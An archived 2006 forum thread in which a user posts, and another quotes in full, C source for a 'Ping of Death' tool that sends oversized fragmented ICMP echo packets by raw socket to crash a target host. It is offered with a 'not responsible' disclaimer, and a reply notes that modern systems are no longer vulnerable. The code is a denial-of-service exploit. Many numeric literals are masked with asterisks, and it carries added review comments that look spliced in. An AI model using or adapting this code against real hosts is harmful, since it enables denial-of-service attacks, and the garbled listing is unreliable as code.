
View Full Version : Ping of Death C source code



Moonbat
09-24-2006, 01:17 PM
Here is a code I found - NOT claiming to be mine - that is written in C (and hence works for C++) that can send out huge ping packets and crash computers. DISCLAIMER - I am not responsible for what you do with this:D


/*
* win*5ping.c
*
* Simulate the evil win*5 "ping -l 655*0 b***yhost".
* version *.0 Bill Fenner <fenner@freebsd.org> 22-Oct-***6
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.*-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win*5 box looks like:
* *7:26:**.0**622 cslwin*5 > arkroyal: icmp: echo request (frag 6*44:*480@0+)
* *7:26:**.0*507* cslwin*5 > arkroyal: (frag 6*44:*480@*480+)
* *7:26:**.0*66*7 cslwin*5 > arkroyal: (frag 6*44:*480@2*60+)
* *7:26:**.0*7577 cslwin*5 > arkroyal: (frag 6*44:*480@4440+)
* *7:26:**.0*88** cslwin*5 > arkroyal: (frag 6*44:*480@5*20+)
* *7:26:**.020**2 cslwin*5 > arkroyal: (frag 6*44:*480@7400+)
* *7:26:**.02**46 cslwin*5 > arkroyal: (frag 6*44:*480@8880+)
* *7:26:**.02264* cslwin*5 > arkroyal: (frag 6*44:*480@*0*60+)
* *7:26:**.02*86* cslwin*5 > arkroyal: (frag 6*44:*480@**840+)
* *7:26:**.025*40 cslwin*5 > arkroyal: (frag 6*44:*480@***20+)
* *7:26:**.026604 cslwin*5 > arkroyal: (frag 6*44:*480@*4800+)
* *7:26:**.027628 cslwin*5 > arkroyal: (frag 6*44:*480@*6280+)
* *7:26:**.02887* cslwin*5 > arkroyal: (frag 6*44:*480@*7760+)
* *7:26:**.0*0*00 cslwin*5 > arkroyal: (frag 6*44:*480@**240+)
* *7:26:**.0***07 cslwin*5 > arkroyal: (frag 6*44:*480@20720+)
* *7:26:**.0*2542 cslwin*5 > arkroyal: (frag 6*44:*480@22200+)
* *7:26:**.0**774 cslwin*5 > arkroyal: (frag 6*44:*480@2*680+)
* *7:26:**.0*50*8 cslwin*5 > arkroyal: (frag 6*44:*480@25*60+)
* *7:26:**.0*6576 cslwin*5 > arkroyal: (frag 6*44:*480@26640+)
* *7:26:**.0*7464 cslwin*5 > arkroyal: (frag 6*44:*480@28*20+)
* *7:26:**.0*86*6 cslwin*5 > arkroyal: (frag 6*44:*480@2*600+)
* *7:26:**.0***66 cslwin*5 > arkroyal: (frag 6*44:*480@**080+)
* *7:26:**.04*2*8 cslwin*5 > arkroyal: (frag 6*44:*480@*2560+)
* *7:26:**.04257* cslwin*5 > arkroyal: (frag 6*44:*480@*4040+)
* *7:26:**.04*807 cslwin*5 > arkroyal: (frag 6*44:*480@*5520+)
* *7:26:**.046276 cslwin*5 > arkroyal: (frag 6*44:*480@*7000+)
* *7:26:**.0472*6 cslwin*5 > arkroyal: (frag 6*44:*480@*8480+)
* *7:26:**.048478 cslwin*5 > arkroyal: (frag 6*44:*480@***60+)
* *7:26:**.04*6*8 cslwin*5 > arkroyal: (frag 6*44:*480@4*440+)
* *7:26:**.050*2* cslwin*5 > arkroyal: (frag 6*44:*480@42*20+)
* *7:26:**.052*64 cslwin*5 > arkroyal: (frag 6*44:*480@44400+)
* *7:26:**.05***8 cslwin*5 > arkroyal: (frag 6*44:*480@45880+)
* *7:26:**.054685 cslwin*5 > arkroyal: (frag 6*44:*480@47*60+)
* *7:26:**.056*47 cslwin*5 > arkroyal: (frag 6*44:*480@48840+)
* *7:26:**.057*** cslwin*5 > arkroyal: (frag 6*44:*480@50*20+)
* *7:26:**.058*57 cslwin*5 > arkroyal: (frag 6*44:*480@5*800+)
* *7:26:**.05*588 cslwin*5 > arkroyal: (frag 6*44:*480@5*280+)
* *7:26:**.060787 cslwin*5 > arkroyal: (frag 6*44:*480@54760+)
* *7:26:**.06202* cslwin*5 > arkroyal: (frag 6*44:*480@56240+)
* *7:26:**.06*247 cslwin*5 > arkroyal: (frag 6*44:*480@57720+)
* *7:26:**.06447* cslwin*5 > arkroyal: (frag 6*44:*480@5*200+)
* *7:26:**.066252 cslwin*5 > arkroyal: (frag 6*44:*480@60680+)
* *7:26:**.066*57 cslwin*5 > arkroyal: (frag 6*44:*480@62*60+)
* *7:26:**.068220 cslwin*5 > arkroyal: (frag 6*44:*480@6*640+)
* *7:26:**.06**07 cslwin*5 > arkroyal: (frag 6*44:**8@65*20)
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 *
 * FIX() is applied to the values main() stores in ip_len and ip_off.
 * With REALLY_RAW defined it converts the value with htons(); without it
 * the value is stored unchanged in host byte order, presumably because the
 * kernel rewrites those two header fields itself on the way out.
 */
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif

/*
 * Builds one IPv4 header plus ICMP echo header in buf and sends it
 * repeatedly over a raw socket, each time as another fragment of the same
 * datagram, to the single host named on the command line.
 *
 * Several numeric literals in this copy are masked with an asterisk, so
 * the listing does not compile as posted; the masked values are left as
 * they are here.
 *
 * What matters to a defender is the traffic shape, which the header
 * comment's tcpdump trace also shows: a run of fragments sharing one IP
 * ID, "more fragments" set on all but the last, and a last fragment whose
 * offset plus length evidently ends beyond 65535 bytes, the largest
 * datagram the 16-bit IPv4 total-length field can describe. No valid
 * datagram can contain such a fragment, so a filter or a reassembly
 * routine can discard it on arrival, before anything is copied into a
 * reassembly buffer.
 *
 * NOTE(review): exit(), bzero(), bcopy(), inet_addr() and inet_ntoa() are
 * used below, but the visible include list has no <stdlib.h>,
 * <string.h>/<strings.h> or <arpa/inet.h>; whether another header pulls
 * them in is platform dependent.
 * NOTE(review): main() never closes s and falls off the end without a
 * return statement.
 */
int
main(int argc, char **argv)
{
int s;
/* One packet's worth of bytes: IP header first, everything after it is payload. */
char buf[*500];
struct ip *ip = (struct ip *)buf;
/* ICMP header placed after the IP header (the addend is masked in this copy). */
struct icmp *icmp = (struct icmp *)(ip + *);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = *;

/* Every byte not set explicitly below stays zero, including the payload. */
bzero(buf, sizeof buf);

/* The raw socket is opened before the arguments are checked. */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(*);
}
/* IP_HDRINCL: the caller supplies the IP header itself, fragment fields included. */
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(*);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(*);
}
/* Resolve by name first; if that fails, try the argument as a dotted-quad address. */
if ((hp = gethostbyname(argv[*])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[*])) == -*) {
/*
 * NOTE(review): only a message is printed here; there is no exit, so
 * execution continues with whatever inet_addr() returned on failure.
 */
fprintf(stderr, "%s: unknown host\n", argv[*]);
}
} else {
/* NOTE(review): copies h_length bytes into a 4-byte s_addr; assumes an IPv4 result. */
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
/* Header fields shared by every fragment; ip_id is set once, so all fragments carry the same ID. */
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4*2*);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
/* Protocol number is masked in this copy; the trace in the header comment shows ICMP. */
ip->ip_p = *;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */

/*
 * NOTE(review): dst is never zeroed and only these two members are
 * assigned, so its remaining members are indeterminate when passed to
 * sendto().
 */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;

icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
/* Hard-coded checksum: it accounts only for the type/code word, the rest of the message being zero. */
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */

/*
 * One sendto() per fragment. offset advances by the payload carried in
 * each packet (buffer size minus IP header size).
 */
for (offset = 0; offset < 655*6; offset += (sizeof buf - sizeof *ip)) {
/* ip_off holds the fragment offset; the shift amount is masked here (IPv4 counts offsets in 8-byte units). */
ip->ip_off = FIX(offset >> *);
if (offset < 65*20)
/* Not the last fragment: set "more fragments". */
ip->ip_off |= FIX(IP_MF);
else
/* Last fragment: MF stays clear and the header length is shortened to the value in the original comment. */
ip->ip_len = FIX(4*8); /* make total 655*8 */
/* A failed send is reported and the loop carries on with the next fragment. */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
/* Only the first fragment carries the ICMP header; later fragments are all-zero payload. */
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}

Ezekiel
09-24-2006, 02:56 PM
Here is a code I found - NOT claiming to be mine - that is written in C (and hence works for C++) that can send out huge ping packets and crash computers. DISCLAIMER - I am not responsible for what you do with this:D


/*
* win*5ping.c
*
* Simulate the evil win*5 "ping -l 655*0 b***yhost".
* version *.0 Bill Fenner <fenner@freebsd.org> 22-Oct-***6
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.*-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win*5 box looks like:
* *7:26:**.0**622 cslwin*5 > arkroyal: icmp: echo request (frag 6*44:*480@0+)
* *7:26:**.0*507* cslwin*5 > arkroyal: (frag 6*44:*480@*480+)
* *7:26:**.0*66*7 cslwin*5 > arkroyal: (frag 6*44:*480@2*60+)
* *7:26:**.0*7577 cslwin*5 > arkroyal: (frag 6*44:*480@4440+)
* *7:26:**.0*88** cslwin*5 > arkroyal: (frag 6*44:*480@5*20+)
* *7:26:**.020**2 cslwin*5 > arkroyal: (frag 6*44:*480@7400+)
* *7:26:**.02**46 cslwin*5 > arkroyal: (frag 6*44:*480@8880+)
* *7:26:**.02264* cslwin*5 > arkroyal: (frag 6*44:*480@*0*60+)
* *7:26:**.02*86* cslwin*5 > arkroyal: (frag 6*44:*480@**840+)
* *7:26:**.025*40 cslwin*5 > arkroyal: (frag 6*44:*480@***20+)
* *7:26:**.026604 cslwin*5 > arkroyal: (frag 6*44:*480@*4800+)
* *7:26:**.027628 cslwin*5 > arkroyal: (frag 6*44:*480@*6280+)
* *7:26:**.02887* cslwin*5 > arkroyal: (frag 6*44:*480@*7760+)
* *7:26:**.0*0*00 cslwin*5 > arkroyal: (frag 6*44:*480@**240+)
* *7:26:**.0***07 cslwin*5 > arkroyal: (frag 6*44:*480@20720+)
* *7:26:**.0*2542 cslwin*5 > arkroyal: (frag 6*44:*480@22200+)
* *7:26:**.0**774 cslwin*5 > arkroyal: (frag 6*44:*480@2*680+)
* *7:26:**.0*50*8 cslwin*5 > arkroyal: (frag 6*44:*480@25*60+)
* *7:26:**.0*6576 cslwin*5 > arkroyal: (frag 6*44:*480@26640+)
* *7:26:**.0*7464 cslwin*5 > arkroyal: (frag 6*44:*480@28*20+)
* *7:26:**.0*86*6 cslwin*5 > arkroyal: (frag 6*44:*480@2*600+)
* *7:26:**.0***66 cslwin*5 > arkroyal: (frag 6*44:*480@**080+)
* *7:26:**.04*2*8 cslwin*5 > arkroyal: (frag 6*44:*480@*2560+)
* *7:26:**.04257* cslwin*5 > arkroyal: (frag 6*44:*480@*4040+)
* *7:26:**.04*807 cslwin*5 > arkroyal: (frag 6*44:*480@*5520+)
* *7:26:**.046276 cslwin*5 > arkroyal: (frag 6*44:*480@*7000+)
* *7:26:**.0472*6 cslwin*5 > arkroyal: (frag 6*44:*480@*8480+)
* *7:26:**.048478 cslwin*5 > arkroyal: (frag 6*44:*480@***60+)
* *7:26:**.04*6*8 cslwin*5 > arkroyal: (frag 6*44:*480@4*440+)
* *7:26:**.050*2* cslwin*5 > arkroyal: (frag 6*44:*480@42*20+)
* *7:26:**.052*64 cslwin*5 > arkroyal: (frag 6*44:*480@44400+)
* *7:26:**.05***8 cslwin*5 > arkroyal: (frag 6*44:*480@45880+)
* *7:26:**.054685 cslwin*5 > arkroyal: (frag 6*44:*480@47*60+)
* *7:26:**.056*47 cslwin*5 > arkroyal: (frag 6*44:*480@48840+)
* *7:26:**.057*** cslwin*5 > arkroyal: (frag 6*44:*480@50*20+)
* *7:26:**.058*57 cslwin*5 > arkroyal: (frag 6*44:*480@5*800+)
* *7:26:**.05*588 cslwin*5 > arkroyal: (frag 6*44:*480@5*280+)
* *7:26:**.060787 cslwin*5 > arkroyal: (frag 6*44:*480@54760+)
* *7:26:**.06202* cslwin*5 > arkroyal: (frag 6*44:*480@56240+)
* *7:26:**.06*247 cslwin*5 > arkroyal: (frag 6*44:*480@57720+)
* *7:26:**.06447* cslwin*5 > arkroyal: (frag 6*44:*480@5*200+)
* *7:26:**.066252 cslwin*5 > arkroyal: (frag 6*44:*480@60680+)
* *7:26:**.066*57 cslwin*5 > arkroyal: (frag 6*44:*480@62*60+)
* *7:26:**.068220 cslwin*5 > arkroyal: (frag 6*44:*480@6*640+)
* *7:26:**.06**07 cslwin*5 > arkroyal: (frag 6*44:**8@65*20)
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 *
 * FIX() is applied to the values main() stores in ip_len and ip_off.
 * With REALLY_RAW defined it converts the value with htons(); without it
 * the value is stored unchanged in host byte order, presumably because the
 * kernel rewrites those two header fields itself on the way out.
 */
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif

/*
 * Quoted copy of the listing from the first post: builds one IPv4 header
 * plus ICMP echo header in buf and sends it repeatedly over a raw socket,
 * each time as another fragment of the same datagram, to the single host
 * named on the command line.
 *
 * Several numeric literals in this copy are masked with an asterisk, so
 * the listing does not compile as posted; the masked values are left as
 * they are here.
 *
 * The traffic shape is the part of interest to a defender: fragments
 * sharing one IP ID, "more fragments" set on all but the last, and a last
 * fragment whose offset plus length evidently ends beyond 65535 bytes,
 * the largest datagram the 16-bit IPv4 total-length field can describe.
 * Such a fragment cannot belong to a valid datagram and can be dropped on
 * arrival, before reassembly copies anything.
 *
 * NOTE(review): exit(), bzero(), bcopy(), inet_addr() and inet_ntoa() are
 * used below, but the visible include list has no <stdlib.h>,
 * <string.h>/<strings.h> or <arpa/inet.h>.
 * NOTE(review): main() never closes s and falls off the end without a
 * return statement.
 */
int
main(int argc, char **argv)
{
int s;
/* One packet's worth of bytes: IP header first, everything after it is payload. */
char buf[*500];
struct ip *ip = (struct ip *)buf;
/* ICMP header placed after the IP header (the addend is masked in this copy). */
struct icmp *icmp = (struct icmp *)(ip + *);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = *;

/* Every byte not set explicitly below stays zero, including the payload. */
bzero(buf, sizeof buf);

/* The raw socket is opened before the arguments are checked. */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(*);
}
/* IP_HDRINCL: the caller supplies the IP header itself, fragment fields included. */
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(*);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(*);
}
/* Resolve by name first; if that fails, try the argument as a dotted-quad address. */
if ((hp = gethostbyname(argv[*])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[*])) == -*) {
/* NOTE(review): message only, no exit; execution continues with inet_addr()'s failure value. */
fprintf(stderr, "%s: unknown host\n", argv[*]);
}
} else {
/* NOTE(review): copies h_length bytes into a 4-byte s_addr; assumes an IPv4 result. */
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
/* Header fields shared by every fragment; ip_id is set once, so all fragments carry the same ID. */
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4*2*);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
/* Protocol number is masked in this copy; the trace in the header comment shows ICMP. */
ip->ip_p = *;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */

/* NOTE(review): dst is never zeroed; only these two members are assigned before sendto(). */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;

icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
/* Hard-coded checksum: it accounts only for the type/code word, the rest of the message being zero. */
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */

/* One sendto() per fragment; offset advances by the payload carried in each packet. */
for (offset = 0; offset < 655*6; offset += (sizeof buf - sizeof *ip)) {
/* ip_off holds the fragment offset; the shift amount is masked here (IPv4 counts offsets in 8-byte units). */
ip->ip_off = FIX(offset >> *);
if (offset < 65*20)
/* Not the last fragment: set "more fragments". */
ip->ip_off |= FIX(IP_MF);
else
/* Last fragment: MF stays clear and the header length is shortened to the value in the original comment. */
ip->ip_len = FIX(4*8); /* make total 655*8 */
/* A failed send is reported and the loop carries on with the next fragment. */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
/* Only the first fragment carries the ICMP header; later fragments are all-zero payload. */
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}



Ping of death may have worked 10 years ago, but all the major operating systems are no longer vulnerable.

That code is only for *nix systems, and windows systems can't even perform the attack now anyway.

Moonbat
09-25-2006, 06:13 PM
Huh? So.. you mean that... it's like... not gonna work?
Well, at least we can all learn from this code, somehow

Ezekiel
09-26-2006, 11:49 AM
Huh? So.. you mean that... it's like... not gonna work?
Well, at least we can all learn from this code, somehow

It has not worked in nearly 10 years - the frequent references to 'win95' in the code show how long ago this vulnerability was fixed.